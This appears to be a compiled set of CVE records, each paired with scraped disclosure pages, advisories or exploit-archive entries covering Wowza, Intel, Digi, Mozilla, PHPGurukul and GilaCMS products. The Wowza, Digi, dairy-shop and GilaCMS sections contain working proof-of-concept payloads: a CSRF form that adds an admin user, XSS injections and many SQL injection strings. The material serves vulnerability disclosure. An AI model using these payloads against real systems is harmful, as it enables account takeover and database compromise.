Wowza Streaming Engine 4.8.0 and earlier suffers from multiple CSRF vulnerabilities. For example, an administrator, by following a link, can be tricked into making unwanted changes such as adding another admin user via enginemanager/server/user/edit.htm in the Server->Users component. This issue was resolved in Wowza Streaming Engine 4.8.5.

The Wowza Streaming Engine 4.7.7 build 20181108145350 and 4.7.8 build 20191105123929 applications suffer from multiple CSRF vulnerabilities. For example, an administrator, by following a link, can be tricked into making unwanted changes like adding another admin user.

**Evidence**

Admin users: 

An authenticated admin user can be tricked into accessing a page containing the following code:

    <html> 
    <body onload='document.frm1.submit();'> 
     <script>history.pushState('', '', '/')</script> 
     <form name="frm1" action="http://192.168.1.180:8088/enginemanager/server/user/edit.htm" method="POST"> 
     <input type="hidden" name="version" value="0" /> 
     <input type="hidden" name="action" value="new" /> 
     <input type="hidden" name="userName" value="wowadmin3" /> 
     <input type="hidden" name="userPassword" value="wowadmin3" /> 
     <input type="hidden" name="userPassword2" value="wowadmin3" /> 
     <input type="hidden" name="accessLevel" value="admin" /> 
     <input type="hidden" name="advUser" value="true" /> 
     <input type="hidden" name="advUser" value="on" /> 
     <input type="hidden" name="ignoreWarnings" value="false" /> 
     <input type="submit" value="Submit request" /> 
     </form> 
     </body> 
    </html>
    

He then unknowingly will make a request that adds another application admin user (wowadmin3):

    POST /enginemanager/server/user/edit.htm HTTP/1.1
    Host: 192.168.1.180:8088
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://wowtest.com/
    Connection: close
    Upgrade-Insecure-Requests: 1
    Pragma: no-cache
    Cache-Control: no-cache
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 150
    
    version=0&action=new&userName=wowadmin3&userPassword=wowadmin3&userPassword2=wowadmin3&accessLevel=admin&advUser=true&_advUser=on&ignoreWarnings=false

CVE-2019-7654: Disclosures/CVE-2019-7654-CSRF-Wowza at master · DrunkenShells/Disclosures

Wowza Streaming Engine 4.8.0 and earlier from multiple authenticated XSS vulnerabilities via the (1) customList%5B0%5D.value field in enginemanager/server/serversetup/edit_adv.htm of the Server Setup configuration or the (2) host field in enginemanager/j_spring_security_check of the login form. This issue was resolved in Wowza Streaming Engine 4.8.5.

Wowza Streaming Engine 4.7.7 and 4.7.8 suffers from multiple authenticated XSS vulnerabilities via the (1) customList%5B0%5D.value field in enginemanager/server/serversetup/edit\_adv.htm of the Server Setup configuration or the (2) host field in enginemanager/j\_spring\_security\_check of the login form.

**XSS(1)**

User input is used inside a javascript function. By crafting a special payload, it is possible to alter the function and inject malicious content without breaking functionality.

  
By sending the following payload:

    POST /enginemanager/server/serversetup/edit_adv.htm HTTP/1.1
    Host: 172.17.60.171:8088
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://172.17.60.171:8088/enginemanager/Home.htm
    Content-Type: application/x-www-form-urlencoded;charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 383
    Cookie: JSESSIONID=2bd567a3c22e0d2d7b4fdb9f6b935c48; lastMangerHost=http%3A//localhost%3A8087; showRightRail=true; lastTab=Advanced; DoNotShowFTU=true
    Connection: close
    
    vhost=_defaultVHost_&advSection=Custom&customList%5B0%5D.documented=false&customList%5B0%5D.enabled=true&customList%5B0%5D.type=String&customList%5B0%5D.sectionName=Server&customList%5B0%5D.section=%2FRoot%2FServer&customList%5B0%5D.name=asdasd&customList%5B0%5D.removed=false&customList%5B0%5D.value=asala";} alert("XSS ServerSetup"); if("true") { var a = "&advPath=%2FRoot%2FServer
    

  
The initTableDataProperties() function gets injected with malitious code:

    HTTP/1.1 200 OK Server: Winstone Servlet Engine v1.0.5 Content-Type: text/html;charset=UTF-8 Connection: Close Date: Tue, 22 Jan 2019 13:34:59 GMT X-Powered-By: Servlet/2.5 (Winstone/1.0.5) Content-Language: en 
    ***TRUNCATED***
    <script>
    var tblDataProperties = new Array();
    var tblIdxProperties=0;
    
    initTableDataProperties();
    updateTableProperties();
    
    function initTableDataProperties()
    {
    	
    		if("true") 
    		{
    			var newItem = new Object();
    			newItem.orgIdx = tblIdxProperties++;
    			newItem.added=false;
    			newItem.removed="false"==="true";
    			newItem.enabled="true"==="true";
    			newItem.name="asdasd";
    			newItem.value="asala";} alert("XSS ServerSetup"); if("true") { var a = "";
    			newItem.type="String";
    			newItem.section="/Root/Server";
    			newItem.sectionName="Server";
    			newItem.documented="false"==="true";
    			newItem.uiBooleanValue="false"==="true";
    			tblDataProperties.push(newItem);
    		}
    		
    	
    }
    ***TRUNCATED***
    

  
The injected code runs in the client browser:

**XSS(2)**

Request:

    POST /enginemanager/j_spring_security_check?wowza-page-redirect= HTTP/1.1
    Host: 192.168.1.180:8088
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.1.180:8088/enginemanager/login.htm
    Cookie: JSESSIONID=324c96d4de48fedbc282e9718f35f56d; DoNotShowFTU=true; lastMangerHost=http%3A//http%3A//192.168.1.180%3A8088%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E; showRightRail=true; lastTab=Basic
    Connection: close
    Upgrade-Insecure-Requests: 1
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 167
    
    wowza-page-redirect=&j_username=ffff&j_password=ffff&authType=digest&host=http%3A%2F%2Fhttp%3A%2F%2F192.168.1.180%3A8088%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E
    

Response:

    HTTP/1.1 200 OK 
    Server: Winstone Servlet Engine v1.0.5 
    Content-Type: text/html;charset=UTF-8 
    Connection: Close Date: Sun, 27 Jan 2019 22:31:56 GMT 
    X-Powered-By: Servlet/2.5 (Winstone/1.0.5) 
    Content-Language: en 
    ***TRUNCATED***
    			Sign In
    	
    
    				</h2>
    				
    					<div id="loginError" class="alert alert-danger"
    						style="word-wrap: break-word">
    						
    						Wowza Streaming Engine Manager could not connect to the Wowza Streaming Engine service(http://http://192.168.1.180:8088<script>alert("XSS")</script>). Verify that the Wowza Streaming Engine service has started and is running.
    					</div>
    
    ***TRUNCATED***

CVE-2019-7655: Disclosures/CVE-2019-7655-XSS-Wowza at master · DrunkenShells/Disclosures

Cleanup errors in some data cache evictions for some Intel(R) Processors may allow an authenticated user to potentially enable information disclosure via local access.

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

**Advanced Search**

**Only search in**

Title Description Content ID

Sign in to access restricted content.

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**Intel® Processors Data Leakage Advisory**

**Summary: **

Potential security vulnerabilities in some Intel® Processors may allow information disclosure.  Intel is releasing firmware updates to mitigate these potential vulnerabilities.

**Vulnerability Details:**

CVEID: CVE-2020-0548

Description: Cleanup errors in some Intel(R) Processors may allow an authenticated user to potentially enable information disclosure via local access.

CVSS Base Score: 2.8 Low

CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:L/I:N/A:N

CVEID: CVE-2020-0549

Description: Cleanup errors in some data cache evictions for some Intel(R) Processors may allow an authenticated user to potentially enable information disclosure via local access.

CVSS Base Score: 6.5 Medium

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N

**Affected Products:**

A list of impacted products can be found here.

**Recommendations:**

Intel recommends that users of affected Intel® Processors update to the latest version firmware provided by the system manufacturer that addresses these issues. 

Intel has released microcode updates for the affected Intel® Processors that are currently supported on the public github repository. Please see details below on access to the microcode:   

GitHub\*: Public Github: https://github.com/intel/Intel-Linux-Processor-Microcode-Data-Files

Additional technical details about these vulnerabilities can be found at:  

https://software.intel.com/security-software-guidance/software-guidance/l1d-eviction-sampling

https://software.intel.com/security-software-guidance/software-guidance/vector-register-sampling

Additional Advisory Guidance on CVE-2020-0548, CVE 2020-0549 available here.

**Acknowledgements:**

Intel would like to thank the following individuals for finding, reporting and coordinating these vulnerabilities to us.

Intel thanks TU Graz and KU Leuven for disclosure of CVE-2020-0549.

Graz University of Technology: Moritz Lipp, Michael Schwarz, Daniel Gruss. 

KU Leuven: Jo Van Bulck.

Intel thanks VU Amsterdam, for disclosure of CVE-2020-0548 and CVE-2020-0549. VUSec group at VU Amsterdam: Stephan van Schaik, Alyssa Milburn, Sebastian Österlund, Pietro Frigo, Kaveh Razavi, Herbert Bos, Cristiano Giuffrida. 

Researchers from TU Graz and Ku Leuven provided Intel with a Proof of Concept (POC) in May 2019 and researchers from VU Amsterdam provided Proof of Concept (POC) in October 2019. Intel subsequently confirmed each submission demonstrates CVE-2020-0549 individually.

**Revision History**

Revision

Date

Description

1.0

01/27/2020

Initial Release

1.1

06/09/2020

Updated Recomendations

1.2

05/11/2021

Added CVE Additional Guidance Link

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel products and services described may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel products that have met their End of Servicing Updates may no longer receive functional and security updates. For additional details on support and servicing, please see this help article. 

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at http://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

Intel and the Intel logo are trademarks of Intel Corporation or its subsidiaries in the United States and other countries.

\*Other names and brands may be claimed as the property of others.  

Copyright © Intel Corporation 2022

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

CVE-2020-0549: INTEL-SA-00329

Digi AnywhereUSB 14 allows XSS via a link for the Digi Page.

Vulnerability Type: Cross Site Scripting (XSS) Vulnerability

Vendor of Product: Digi International

Affected Product Code Base: AnywhereUSB - 14

Firmware Version: 1.93.21.19

Description: Digi AnywhereUSB 14 allows XSS via a link for the Digi Page.

Attack Vectors: Someone must open a link for the Digi Page

Attack Type: Remote

Payload: //--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

Steps To Reproduce

1\. Browse the Web Page of the Digi’s AnywhereUSB and trying not to log in

2.You can create your malicious payload like the following and run your arbitrary JavaScript code on the browser’s of the victim

Example: http://<IP Address of the Digi Anywhere USB>///--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

#PoC

GET //--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> HTTP/1.1

Host: Target IP

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Connection: close

Upgrade-Insecure-Requests: 1

CVE-2019-18859: Cross Site Scripting (XSS) Vulnerability

After a HelloRetryRequest has been sent, the client may negotiate a lower protocol that TLS 1.3, resulting in an invalid state transition in the TLS State Machine. If the client gets into this state, incoming Application Data records will be ignored. This vulnerability affects Firefox < 72.

Sorry, I can't find "_1590001?cve=title_". It does not seem like bug number nor an alias to a bug.

Please press **Back** and try again.

CVE-2019-17023: Invalid Bug ID

By using a form with a data URI it was possible to gain access to the privileged JSONView object that had been cloned into content. Impact from exposing this object appears to be minimal, however it was a bypass of existing defense in depth mechanisms. This vulnerability affects Firefox < 70, Thunderbird < 68.2, and Firefox ESR < 68.2.

**Mozilla Foundation Security Advisory 2019-35**

Announced

October 22, 2019

Impact

critical

Products

Thunderbird

Fixed in

*   Thunderbird 68.2

**#CVE-2019-15903: Heap overflow in expat library in XML\_GetCurrentLineNumber**

Reporter

Sebastian Pipping

Impact

high

**Description**

In libexpat before 2.2.8, crafted XML input could fool the parser into changing from DTD parsing to document parsing too early. A subsequent call to XML_GetCurrentLineNumber or XML_GetCurrentColumnNumber then resulted in a heap-based buffer over-read.

**References**

*   Bug 1584907

**#CVE-2019-11757: Use-after-free when creating index updates in IndexedDB**

Reporter

Zhanjia Song

Impact

high

**Description**

When following the value's prototype chain, it was possible to retain a reference to a locale, delete it, and subsequently reference it. This resulted in a use-after-free and a potentially exploitable crash.

**References**

*   Bug 1577107

**#CVE-2019-11758: Potentially exploitable crash due to 360 Total Security**

Reporter

Mozilla developers and community

Impact

high

**Description**

Mozilla community member Philipp reported a memory safety bug present in Firefox 68 when 360 Total Security was installed. This bug showed evidence of memory corruption in the accessibility engine and we presume that with enough effort that it could be exploited to run arbitrary code.

**References**

*   Bug 1536227

**#CVE-2019-11759: Stack buffer overflow in HKDF output**

Reporter

Guido Vranken

Impact

moderate

**Description**

An attacker could have caused 4 bytes of HMAC output to be written past the end of a buffer stored on the stack. This could be used by an attacker to execute arbitrary code or more likely lead to a crash.

**References**

*   Bug 1577953

**#CVE-2019-11760: Stack buffer overflow in WebRTC networking**

Reporter

Nils

Impact

moderate

**Description**

A fixed-size stack buffer could overflow in nrappkit when doing WebRTC signaling. This resulted in a potentially exploitable crash in some instances.

**References**

*   Bug 1577719

**#CVE-2019-11761: Unintended access to a privileged JSONView object**

Reporter

Cody Crews

Impact

moderate

**Description**

By using a form with a data URI it was possible to gain access to the privileged JSONView object that had been cloned into content. Impact from exposing this object appears to be minimal, however it was a bypass of existing defense in depth mechanisms.

**References**

*   Bug 1561502

**#CVE-2019-11762: document.domain-based origin isolation has same-origin-property violation**

Reporter

Kris Maglione

Impact

moderate

**Description**

If two same-origin documents set document.domain differently to become cross-origin, it was possible for them to call arbitrary DOM methods/getters/setters on the now-cross-origin window.

**References**

*   Bug 1582857

**#CVE-2019-11763: Incorrect HTML parsing results in XSS bypass technique**

Reporter

Gareth Heyes

Impact

moderate

**Description**

Failure to correctly handle null bytes when processing HTML entities resulted in Firefox incorrectly parsing these entities. This could have led to HTML comment text being treated as HTML which could have led to XSS in a web application under certain conditions. It could have also led to HTML entities being masked from filters - enabling the use of entities to mask the actual characters of interest from filters.

**References**

*   Bug 1584216

**#CVE-2019-11764: Memory safety bugs fixed in Thunderbird 68.2**

Reporter

Mozilla developers and community

Impact

critical

**Description**

Mozilla developers and community members Bob Clary, Jason Kratzer, Aaron Klotz, Iain Ireland, Tyson Smith, Christian Holler, Steve Fink, Honza Bambas, Byron Campen, and Cristian Brindusan reported memory safety bugs present in Firefox 69 and Firefox ESR 68.1. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could be exploited to run arbitrary code.

**References**

*   Memory safety bugs fixed in Firefox 70 and Firefox ESR 68.2

CVE-2019-11761: Security vulnerabilities fixed in - Thunderbird 68.2

PHPGurukul Dairy Farm Shop Management System 1.0 is vulnerable to SQL injection, as demonstrated by the username parameter in index.php, the category and CategoryCode parameters in add-category.php, the CompanyName parameter in add-company.php, and the ProductName and ProductPrice parameters in add-product.php.

    # Exploit Title: Dairy Farm Shop Management System 1.0 - 'username' SQL Injection
    # Google Dork: N/A
    # Date: 2020-01-03
    # Exploit Author: Chris Inzinga
    # Vendor Homepage: https://phpgurukul.com/
    # Software Link: https://phpgurukul.com/dairy-farm-shop-management-system-using-php-and-mysql/
    # Version: v1.0
    # Tested on: Windows
    # CVE: N/A
    
    # The Dairy Farm Shop Management System 1.0 web application is vulnerable to 
    # SQL injection in multiple areas. The most severe of these is the username 
    # parameter on the login page as this injection can be done unauthenticated.
    
    
    ================================ 'username' - SQLi ================================
    
    POST /dfsms/index.php HTTP/1.1
    Host: 192.168.0.33
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.0.33/dfsms/index.php
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 34
    Connection: close
    Cookie: PHPSESSID=ogvk4oricas9oudnb7hb88kgjg
    Upgrade-Insecure-Requests: 1
    
    username=test&password=test&login=
    
    ---
    Parameter: username (POST)
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: username=test' AND (SELECT 5667 FROM (SELECT(SLEEP(5)))mKGL) AND 'UlkV'='UlkV&password=test&login=
    ---
    [INFO] the back-end DBMS is MySQL
    back-end DBMS: MySQL >= 5.0.12
    
    
    
    ================================ 'category' & 'categorycode' - SQLi ================================
    
    POST /dfsms/add-category.php HTTP/1.1
    Host: 192.168.0.33
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.0.33/dfsms/add-category.php
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 39
    Connection: close
    Cookie: PHPSESSID=ogvk4oricas9oudnb7hb88kgjg
    Upgrade-Insecure-Requests: 1
    
    category=test&categorycode=test&submit=
    
    ---
    Parameter: category (POST)
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: category=test' AND (SELECT 8892 FROM (SELECT(SLEEP(5)))WzFH) AND 'NELe'='NELe&categorycode=test&submit=
    ---
    [INFO] the back-end DBMS is MySQL
    back-end DBMS: MySQL >= 5.0.12
    
    ---
    Parameter: categorycode (POST)
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: category=test&categorycode=test' AND (SELECT 9140 FROM (SELECT(SLEEP(5)))bzQA) AND 'izaK'='izaK&submit=
    ---
    [INFO] the back-end DBMS is MySQL
    back-end DBMS: MySQL >= 5.0.12
    
    
    
    ================================ 'companyname' - SQLi ================================
    
    ---
    Parameter: companyname (POST)
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: companyname=test' AND (SELECT 7565 FROM (SELECT(SLEEP(5)))znna) AND 'bEUm'='bEUm&submit=
    ---
    [INFO] the back-end DBMS is MySQL
    back-end DBMS: MySQL >= 5.0.12
    
    
    
    ================================ 'productname' & 'productprice' - SQLi ================================
    
    ---
    Parameter: productname (POST)
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: category=Milk&company=Amul&productname=test' AND (SELECT 1171 FROM (SELECT(SLEEP(5)))rlQI) AND 'RgaN'='RgaN&productprice=test&submit=
    ---
    ---
    Parameter: productprice (POST)
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: category=Milk&company=Amul&productname=test&productprice=test' AND (SELECT 8940 FROM (SELECT(SLEEP(5)))BRuk) AND 'Imqh'='Imqh&submit=
    ---
    [INFO] the back-end DBMS is MySQL
    back-end DBMS: MySQL >= 5.0.12
    
    
    
    ================================ 'fromdate' & 'todate' - SQLi ================================
    
    ---
    Parameter: todate (POST)
        Type: boolean-based blind
        Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
        Payload: fromdate=2020-01-05&todate=-6737' OR 3099=3099#&submit=
    
        Type: error-based
        Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
        Payload: fromdate=2020-01-05&todate=2020-01-31' OR (SELECT 3665 FROM(SELECT COUNT(*),CONCAT(0x7162766271,(SELECT (ELT(3665=3665,1))),0x716a7a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- mqby&submit=
    
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: fromdate=2020-01-05&todate=2020-01-31' AND (SELECT 5717 FROM (SELECT(SLEEP(5)))adaE)-- cLAK&submit=
    
        Type: UNION query
        Title: MySQL UNION query (NULL) - 5 columns
        Payload: fromdate=2020-01-05&todate=2020-01-31' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162766271,0x666369456150614b454a4f51454e6e687449724a786445585455515a67614162754545716d476f6f,0x716a7a7171),NULL#&submit=
    
    Parameter: fromdate (POST)
        Type: error-based
        Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
        Payload: fromdate=2020-01-05' AND (SELECT 7128 FROM(SELECT COUNT(*),CONCAT(0x7162766271,(SELECT (ELT(7128=7128,1))),0x716a7a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- Tzxh&todate=2020-01-31&submit=
    
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: fromdate=2020-01-05' AND (SELECT 7446 FROM (SELECT(SLEEP(5)))Aklw)-- uzkF&todate=2020-01-31&submit=
    ---
    
    
    
    ================================ 'mobilenumber' & 'emailid' & 'adminname' - SQLi ================================
    
    ---
    Parameter: emailid (POST)
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: adminname=Admin&username=admin&emailid=admin@test.com' AND (SELECT 5884 FROM (SELECT(SLEEP(5)))EgFJ) AND 'kFGt'='kFGt&mobilenumber=1234567899&update=
    ---
    ---
    Parameter: adminname (POST)
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: adminname=Admin' AND (SELECT 5969 FROM (SELECT(SLEEP(5)))vpfG) AND 'kOJS'='kOJS&username=admin&emailid=admin@test.com&mobilenumber=1234567899&update=
    ---
    ---
    Parameter: mobilenumber (POST)
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: adminname=Admin&username=admin&emailid=admin@test.com&mobilenumber=1234567899' AND (SELECT 1163 FROM (SELECT(SLEEP(5)))rdwj) AND 'mnwu'='mnwu&update=
    ---

CVE-2020-5307: OffSec’s Exploit Database Archive

Gila CMS 1.11.8 allows /admin/sql?query= SQL Injection.

Skip to content

**Product Owner:** GilaCMS

**Application Name:** GilaCMS 1.11.8

**CVE ID:** CVE-2020-5515

**Type:** Installable/Customer-Controlled Application

**Application Release Date:** 4th December,2019

**Severity:** High

**Authentication:** Required

**Complexity:** Easy

**Vulnerability Name:** SQL Injection in ‘/admin/sql?query=’

**Vulnerability Explanation:** SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database.

**Verified In:**  
Firefox 71.0 (64-bit)  
Windows 10  
Hosted using XAMPP v3.2.4

**Request:**  
GET /gilacms/admin/sql?query={INJECTION_POINT} HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Connection: close  
Cookie: GSESSIONID=1za7iusvgawzjs936iegtmmtwfghbbp6ectnugwb0clvc0z37u  
Upgrade-Insecure-Requests: 1

**Steps to Reproduce:**  
1\. Login to the GilaCMS application as admin.  
2\. Visit the following page: http://localhost/gilacms/admin/sql  

3\. Click on ‘Show Tables’. It takes us to http://localhost/gilacms/admin/sql?query=SHOW%20TABLES  

4\. The ‘query’ parameter is vulnerable to SQL injection (Inline Queries)  
http://localhost/gilacms/admin/sql?query=SELECT VERSION(),USER()  
  

http://localhost/gilacms/admin/sql?query=SELECT \* FROM user  

**Vulnerable Code:**  
The ‘query’ parameter sent in the GET request (http://localhost/gilacms/admin/sql) is vulnerable to SQL Injection.  

**Reference:**  
**Website:** https://gilacms.com/  
**GitHub Repository:** https://github.com/GilaCMS/gila  
**Download Version:** https://github.com/GilaCMS/gila/releases/tag/1.11.8

**Post navigation**

CVE-2020-5515: GilaCMS 1.11.8 – ‘/admin/sql?query=’ SQL Injection

Improper conditions check in the Linux kernel driver for the Intel(R) FPGA SDK for OpenCL(TM) Pro Edition before version 19.4 may allow an authenticated user to potentially enable denial of service via local access.

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

**Advanced Search**

**Only search in**

Title Description Content ID

Sign in to access restricted content.

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**Intel® FPGA SDK for OpenCL™ Advisory**

**Summary: **

A potential security vulnerability in the Intel® Field Programmable Gate Array (FPGA) Software Development Kit (SDK) for OpenCL™ may allow denial of service.  Intel is releasing Linux kernel driver updates to mitigate this potential vulnerability.

**Vulnerability Details:**

CVEID: CVE-2019-11165  

Description: Improper conditions check in the Linux kernel driver for the Intel(R) FPGA SDK for OpenCL(TM) Pro Edition before version 19.4 may allow an authenticated user to potentially enable denial of service via local access.

CVSS Base Score: 5.0 Medium

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:H

**Affected Products:**

Intel® FPGA SDK for OpenCL™ before version 19.4.

**Recommendations:**

Intel recommends updating Intel® FPGA SDK for OpenCL™ to version 19.3 and to download and install patch 0.24 on version 19.3:

http://download.altera.com/akdlm/software/acs/19.3/0.24cl/opencl-19.3-0.24cl-linux.run

Intel® FPGA SDK for OpenCL™ version 19.4 and future versions will contain the fix.

Intel® FPGA SDK for OpenCL™ is available for download at this location: http://fpgasoftware.intel.com/opencl/

**Acknowledgements:**

Intel would like to thank Nitin Pundir for reporting this issue.

Intel, and nearly the entire technology industry, follows a disclosure practice called Coordinated Disclosure, under which a cybersecurity vulnerability is generally publicly disclosed only after mitigations are available.

**Revision History**

Revision

Date

Description

1.0

12/10/2019

Initial Release

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel products and services described may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel products that have met their End of Servicing Updates may no longer receive functional and security updates. For additional details on support and servicing, please see this help article. 

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at http://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

Intel and the Intel logo are trademarks of Intel Corporation or its subsidiaries in the United States and other countries.

\*Other names and brands may be claimed as the property of others.  

Copyright © Intel Corporation 2022

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

CVE-2019-11165: INTEL-SA-00284

Improper permissions in the installer for the License Server software for Intel® Quartus® Prime Pro Edition before version 19.3 may allow an authenticated user to potentially enable escalation of privilege via local access.

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

**Advanced Search**

**Only search in**

Title Description Content ID

Sign in to access restricted content.

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**Intel® Quartus® Prime Pro Edition Advisory**

Intel ID:

INTEL-SA-00311

Advisory Category:

Software

Impact of vulnerability:

